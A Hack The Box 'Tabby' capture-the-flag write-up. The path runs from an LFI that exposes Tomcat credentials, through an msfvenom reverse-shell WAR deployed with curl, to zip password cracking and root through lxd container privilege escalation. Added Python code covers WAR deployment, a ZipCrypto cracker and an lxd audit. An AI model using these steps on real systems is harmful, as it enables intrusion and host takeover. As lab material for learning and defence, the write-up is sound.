Welcome back, reader. Egre55 made another cool Linux box, "Tabby", which HTB released last Saturday. Tabby starts with a simple LFI that exposes a Tomcat credential, leads from there to a reverse shell by deploying a malicious WAR through the Tomcat manager, then to a second user, and straight on to root.
The box is in fact straightforward from the second user onward; gaining root, however, rests entirely on Linux lxd group privilege escalation, which was new to me.

Enumeration
Let us get started then. As always, the machine IP is added to /etc/hosts as tabby.htb, and I fire up Nmap for a port scan.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 09:36 +03
Discovered open port 80/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Discovered open port 22/tcp on 10.10.10.194
Completed SYN Stealth Scan at 09:36, 2.07s elapsed (1000 total ports)
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/21%OT=22%CT=1%CU=41896%PV=Y%DS=2%DC=T%G=Y%TM=5EEF000
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 12.366 days (since Tue Jun 9 00:49:25 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 995/tcp)
HOP RTT ADDRESS
1 128.32 ms 10.10.14.1
2 128.88 ms 10.10.10.194
NSE: Script Post-scanning.
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.88 seconds
Raw packets sent: 1289 (61.746KB) | Rcvd: 1410 (433.356KB)
Nmap comes back with three open ports: SSH on 22, Apache httpd 2.4.41 on 80, and Apache Tomcat on 8080.

Visiting tabby.htb on port 80 shows the website of a hosting company, Mega Hosting. A section lower on the page says "We have recently upgraded several services. Our servers are now more secure than ever. Read our statement on recovering from the data breach", with a link to http://megahosting.htb/news.php?file=statement.
I immediately added the new host name (megahosting.htb) to the hosts file and opened the link. The statement says the company was involved in a data breach in the past, so I decided to concentrate my enumeration on finding backups or archives of some sort.

The Statement:
The statement the company issued to its customers apologises for the previous data breach and promises them a more secure environment.

LFI – Local File Inclusion
Seeing "***.php?file=" made me suspect an LFI. A PHP script that loads a file named in a request parameter, for example /script.php?page=index.html, is a prime candidate for LFI testing. The basic test is to ask for a well-known file through directory traversal, such as /script.php?page=../../../../../../../../etc/passwd: if the contents of /etc/passwd come back, or at least no error is raised, the parameter is worth pushing further. I ran the same test against news.php?file= with /etc/passwd, and yes, the website is vulnerable to LFI.

Hosts file:

So it is confirmed that a directory traversal attack works against this website. The second web server, on port 8080, has no real website, just the stock Tomcat confirmation page. That page does carry a surprise, though: at the bottom it says "NOTE: For security reasons, using the manager web app is restricted to users with role "manager-gui". The host-manager web app is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml."

That means I can read the user list through the LFI by requesting /etc/tomcat9/tomcat-users.xml. When I first opened it in the browser the page looked empty but raised no error either: the XML is served as HTML, so the browser renders its tags as markup and a <user/> element has no visible text. The content is there in the page source (or in a curl response), and that is where I found a credential for the user "tomcat":

<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
Creating a Backdoor WAR file
With the credentials of the user "tomcat" in hand, I went looking for a login page to use them on, but nothing seemed to be there, and a little fuzzing turned up nothing useful either. The roles explain it: this account has manager-script, not manager-gui, so the HTML manager at /manager/html refuses it; what manager-script does grant is the text interface at /manager/text, and that is all that is needed to deploy an application. So I looked at exploiting Tomcat with the credentials directly. After some research I found an article (see the references) explaining how to use msfvenom to create a WAR file carrying a reverse-shell payload, upload it to the server through the manager and catch the connection on my machine. This is an authenticated attack, and I have the credentials.
I recalled the old HTB machine Jerry, where a similar approach was used: create a WAR backdoor with msfvenom, upload it through the manager's deploy feature and receive the reverse connection.
root@nav1n:~/htb/tabby # msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war
Payload size: 1081 bytes
Final size of war file: 1081 bytes
root@nav1n:~/htb/tabby #
Uploading the WAR file
I knew it was possible to upload with cURL, but I needed an authenticated upload. The text interface accepts the WAR as the body of an HTTP PUT to /manager/text/deploy with HTTP Basic authentication, which is exactly what curl's --user and --upload-file options produce (the exact invocation came from one of the references below).
root@nav1n:~/htb/tabby # curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "http://megahosting.htb:8080/manager/text/deploy?path=/exploit.war"
OK - Deployed application at context path [/exploit.war]
root@nav1n:~/htb/tabby #
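What the curl line above does, as an added Python example (not the post's msfvenom and curl commands, and not Tomcat's code): build a WAR in memory and PUT it to the text interface with Basic auth. The JSP here only reports the account Tomcat runs as, which is enough to prove server-side code execution; the context path /probe and the file name index.jsp are assumptions, and the post's WAR differed only in carrying a reverse-shell JSP instead.

```python
"""Build a minimal WAR in memory and deploy it through Tomcat's text manager
interface, the one the manager-script role grants.

Added example; this is neither the post's msfvenom command nor Tomcat's
own code. The JSP only proves server-side execution by reporting the
account Tomcat runs as; the post's WAR carried a reverse shell instead.
"""
import base64
import io
import sys
import urllib.request
import zipfile

# Empty deployment descriptor: Tomcat compiles and serves *.jsp without mappings.
WEB_XML = ('<?xml version="1.0" encoding="UTF-8"?>\n'
           '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1"/>\n')

# Proof-of-execution JSP (assumed name index.jsp so the context root serves it).
PROBE_JSP = ('<%@ page contentType="text/plain" %>'
             'user=<%= System.getProperty("user.name") %> '
             'java=<%= System.getProperty("java.version") %>\n')


def build_war(jsp_source=PROBE_JSP, jsp_name="index.jsp"):
    """Return the bytes of a WAR (a zip) holding WEB-INF/web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Names inside the archive, for sanity-checking what will be deployed."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def deploy_request(base, user, password, context, war_bytes):
    """HTTP PUT to /manager/text/deploy with Basic auth; curl --user/--upload-file
    sends the same request. update=true lets the same context be redeployed."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(
        f"{base}/manager/text/deploy?path={context}&update=true",
        data=war_bytes, method="PUT")
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/octet-stream")
    return req


def deploy(base, user, password, context, war_bytes, opener=urllib.request.urlopen):
    """Send the deploy request; Tomcat answers 'OK - Deployed application at context path [...]'."""
    with opener(deploy_request(base, user, password, context, war_bytes)) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # usage: python3 deploy_war.py http://megahosting.htb:8080 tomcat 'password' /probe
    base, user, password, context = sys.argv[1:5]
    war = build_war()
    print(deploy(base, user, password, context, war).strip())
    print(f"now request {base}{context}/ to run the JSP, and "
          f"{base}/manager/text/undeploy?path={context} to clean up")
```

Once Tomcat answers OK, requesting http://host:8080/probe/ runs the JSP and the returned user name is the account any deployed code will run as; /manager/text/undeploy?path=/probe removes the application again, which is worth doing on an engagement so the backdoor does not outlive the test.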
Reverse Shell
I started my listener and requested the deployed application at http://megahosting.htb:8080/exploit.war/ to run the JSP. The listener fired and I received the reverse shell; I upgraded the TTY to get a proper shell.

After some time enumerating, I found a zip archive in /var/www/html/files called 16162020_backup.zip, which I assumed would contain credentials or something of that kind.
tomcat@tabby:/var/www/html/files$ ls
16162020_backup.zip archive revoked_certs statement
tomcat@tabby:/var/www/html/files$
I downloaded it to my Kali box and tried to extract it, but it is password protected. A few common passwords did not work, so I turned to fcrackzip.
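How fcrackzip gets there, as an added Python example that is not the post's command: a dictionary attack on the traditional ZipCrypto scheme, which is the only one fcrackzip handles. Python's zipfile cannot write encrypted entries, so the block includes a small ZipCrypto encryptor to build a constructed sample entry; the password admin@it and the word list are constructed to mirror the post, and crack_archive shows the same attack against a real file.

```python
"""Dictionary attack on a ZipCrypto (traditional PKWARE) protected archive,
the way fcrackzip does it: derive the three keys from a candidate password,
decrypt the 12-byte encryption header and compare its last byte with the
check byte stored in the zip; only the rare survivors get a full decrypt.

Added example, not the post's fcrackzip command. Python's zipfile cannot
write encrypted entries, so a small encryptor is included to build a
constructed sample; the password admin@it and the word list are constructed
to mirror the post.
"""
import zipfile
import zlib

# Plain table-driven CRC-32 update (no pre/post inversion), as ZipCrypto specifies.
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc_update(crc, byte):
    return _CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """Key schedule and keystream of traditional PKWARE encryption (APPNOTE 6.1)."""

    def __init__(self, password):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password.encode():
            self._update(b)

    def _update(self, plain_byte):
        self.k0 = _crc_update(self.k0, plain_byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc_update(self.k2, self.k1 >> 24)

    def _keystream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)          # keys advance on the plaintext byte
            out.append(p)
        return bytes(out)

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)
        return bytes(out)


def encrypt_stored_entry(password, plaintext, salt=b"\x01" * 11):
    """Constructed sample builder: encrypt a STORED entry. Returns (crc32, header+data).
    The 12th header byte is the high byte of the CRC (general-purpose flag bit 3 clear)."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = salt + bytes([crc >> 24])
    return crc, ZipCrypto(password).encrypt(header + plaintext)


def crack(crc, blob, wordlist):
    """Return the first candidate that passes the check byte AND the full CRC, else None."""
    check = crc >> 24
    for word in wordlist:
        z = ZipCrypto(word)
        if z.decrypt(blob[:12])[-1] != check:  # cheap filter, about 1/256 false positives
            continue
        if zlib.crc32(z.decrypt(blob[12:])) & 0xFFFFFFFF == crc:  # confirm survivors
            return word
    return None


def crack_archive(path, wordlist):
    """Same attack against a real file, letting zipfile's own ZipCrypto do the work."""
    with zipfile.ZipFile(path) as zf:
        info = next(i for i in zf.infolist() if i.flag_bits & 0x1)  # first encrypted entry
        for word in wordlist:
            try:
                zf.read(info, pwd=word.encode())
                return word
            except (RuntimeError, zipfile.BadZipFile):  # bad check byte / bad CRC
                continue
    return None
```

The check byte is why these tools are fast: a wrong password is rejected after decrypting 12 bytes, and only about one candidate in 256 survives to the full decrypt and CRC comparison, which is what rules out the false positives.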

fcrackzip recovered the zip password as "admin@it". The archive opened, but it did not take long to see that its contents are a rabbit hole: what I really had was a password with no obvious place to use it. After a while I went back to the /etc/passwd I had from the LFI, looking for users the password might belong to. Among the few real accounts, ash stood out. I tried to SSH into the box as ash with that password, but it did not work.
root@nav1n:~/htb/tabby # ssh ash@tabby.htb
The authenticity of host 'tabby.htb (10.10.10.194)' can't be established.
ECDSA key fingerprint is SHA256:fMuIFpNbN9YiPCAj+b/iV5XPt9gNRdvR5x/Iro2HrKo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'tabby.htb,10.10.10.194' (ECDSA) to the list of known hosts.
ash@tabby.htb: Permission denied (publickey).
The "(publickey)" in that error means the SSH daemon only offers key authentication, so a password cannot be tested over SSH at all. Going through the HTB forum, I realised I should simply su to ash from the tomcat shell. The switch worked flawlessly, which confirms that the zip password is ash's account password.
Getting User
After switching to ash I found the user flag in ash's home directory.
ash@tabby:/home$ cd ash
ash@tabby:~$ ls
snap user.txt
ash@tabby:~$ cat user.txt
c65e5c2147cff77908b01a75d02dced4
ash@tabby:~$
Privilege Escalation
Running id shows that ash is a member of 30(dip), 46(plugdev) and 116(lxd). The plugdev and dip groups are not useful for escalation, but the lxd (Linux containers) group is. LXD's own documentation warns that access to the LXD socket should only be given to users who are trusted with root on the host, because anyone who can talk to it can create a privileged container and attach host devices and filesystems to it.
So I looked for PoCs and articles on lxd group privilege escalation and found some good reads, listed in the references at the end.
Preparation of the exploit
According to these, the first step is to build a container image and import it onto the box. Alpine is the recommended choice because it is very small, so uploading it to the machine is painless.
root@nav1n:~ # git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (27/27), done.
root@nav1n:~ # cd lxd-alpine-builder
root@nav1n:~/lxd-alpine-builder(master○) # ls
build-alpine LICENSE README.md
root@nav1n:~/lxd-alpine-builder(master○) # ./build-alpine
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
After the build, the builder left an image file called "alpine-v3.12-x86_64-20200621_2005.tar.gz", which I copied to my tabby working directory.

Then I served it with Python's http.server and fetched it into a temp directory I created in ash's home.

Once the file is on the box it has to be imported into LXD as an image. I ran the import command and then lxc image list to confirm; the image shows up under the alias nav1n.
alpine-v3.12-x86_64 100%[===================>] 3.07M 216KB/s in 13s
2020-06-21 20:53:58 (249 KB/s) - ‘alpine-v3.12-x86_64-20200621_2005.tar.gz’ saved [3218328/3218328]
ash@tabby:~/temp$ ls
alpine-v3.12-x86_64-20200621_2005.tar.gz
ash@tabby:~/temp$ lxc image import ./alpine-v3.12-x86_64-20200621_2005.tar.gz --alias nav1n
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
ash@tabby:~/temp$ lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| nav1n | 4d9d71e56111 | no | alpine v3.12 (20200621_20:05) | x86_64 | CONTAINER | 3.07MB | Jun 21, 2020 at 8:54pm (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:~/temp$
Following the article, I create a privileged container from the image, attach the host's root filesystem to it as a disk device at /mnt/root, start it and exec a shell. One thing to keep straight: the uid 0 shown below is root inside the container; the host's files are reached through /mnt/root, where they can be read and written as root.
ash@tabby:~/temp$ lxc init nav1n tester -c security.privileged=true
Creating tester
ash@tabby:~/temp$ lxc config device add tester mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to tester
ash@tabby:~/temp$ lxc start tester
ash@tabby:~/temp$ lxc exec tester /bin/sh
total 4
drwx------ 1 root root 24 Jun 21 21:17 .
drwxr-xr-x 1 root root 114 Jun 21 21:16 ..
-rw------- 1 root root 46 Jun 21 21:18 .ash_history
/home # id
uid=0(root) gid=0(root)
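The same escape seen from the defender's side, as an added Python example that is not part of the post: one check lists who is in the lxd (or lxc) group, and therefore root-equivalent, from /etc/group; the other reads the output of lxc config show <container> --expanded and flags the two settings that together turn a container into a host root shell, security.privileged=true and a disk device whose source is the host's /. The samples are constructed, using the container and device names from the post.

```python
"""Two defender-side checks for the lxd escape: which accounts can reach the
LXD socket at all, and whether a given container is privileged with the host
root filesystem mapped into it.

Added example, not from the post. Inputs are the text of /etc/group and of
`lxc config show <container> --expanded`; the samples below are constructed,
with the container and device names the post used.
"""


def lxd_group_members(group_text, groups=("lxd", "lxc")):
    """Map group name -> members for the container groups; these users are root-equivalent."""
    members = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] in groups:
            members[parts[0]] = [u for u in parts[3].split(",") if u]
    return members


def parse_simple_yaml(text):
    """Indentation-based parser for the scalar/mapping subset that `lxc config show`
    emits. List items (the profiles block) are skipped; PyYAML is not needed."""
    root = {}
    stack = [(-1, root)]
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith(("#", "- ")):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        value = value.strip().strip('"')
        while indent <= stack[-1][0]:
            stack.pop()
        parent = stack[-1][1]
        if value:
            parent[key] = value
        else:
            parent[key] = {}
            stack.append((indent, parent[key]))
    return root


def audit_container(config_text):
    """Findings that, together, make the container a host root shell."""
    cfg = parse_simple_yaml(config_text)
    findings = []
    if cfg.get("config", {}).get("security.privileged", "false").lower() == "true":
        findings.append("security.privileged=true: uid 0 inside is uid 0 on the host")
    for name, dev in cfg.get("devices", {}).items():
        if isinstance(dev, dict) and dev.get("type") == "disk" and dev.get("source", "").startswith("/"):
            what = "host root filesystem" if dev["source"] == "/" else "host path"
            findings.append(f"device {name}: {what} {dev['source']} mounted at {dev.get('path')}")
    return findings


def is_host_escape(config_text):
    """True when both conditions hold, i.e. the layout used for the escape above."""
    f = audit_container(config_text)
    return (any(x.startswith("security.privileged=true") for x in f)
            and any("host root filesystem" in x for x in f))


# --- constructed samples ---------------------------------------------------------
SAMPLE_GROUP = """root:x:0:
sudo:x:27:
lxd:x:116:ash
tomcat:x:998:
"""

SAMPLE_CONFIG = """architecture: x86_64
config:
  image.description: alpine v3.12 (20200621_20:05)
  security.privileged: "true"
  volatile.last_state.power: RUNNING
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
  root:
    path: /
    pool: default
    type: disk
ephemeral: false
profiles:
- default
stateful: false
"""

if __name__ == "__main__":
    import subprocess
    import sys
    # live mode on a host: python3 lxd_audit.py <container>; no argument uses the samples
    if len(sys.argv) > 1:
        group_text = open("/etc/group").read()
        config_text = subprocess.run(["lxc", "config", "show", sys.argv[1], "--expanded"],
                                     capture_output=True, text=True, check=True).stdout
    else:
        group_text, config_text = SAMPLE_GROUP, SAMPLE_CONFIG
    print("container-group members:", lxd_group_members(group_text))
    for finding in audit_container(config_text):
        print("FINDING:", finding)
    print("host escape:", is_host_escape(config_text))
```

The first check is the one that matters for hardening: a shell account in the lxd group is a root account with extra steps, so membership should be reviewed the same way sudo membership is. The second is useful in incident response, where a freshly created privileged container with / attached is a strong indicator of exactly this technique.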

So, that’s all. Thank you for reading.
References
- https://pentestlab.blog/2012/08/26/using-metasploit-to-create-a-war-backdoor
- https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_upload
- https://gist.github.com/pete911/6111816
- https://shenaniganslabs.io/2019/05/21/LXD-LPE.html
- https://ethicalhackingguru.com/the-lxd-privilege-escalation-tutorial-how-to-exploit-lxd/
- https://www.hackingarticles.in/lxd-privilege-escalation/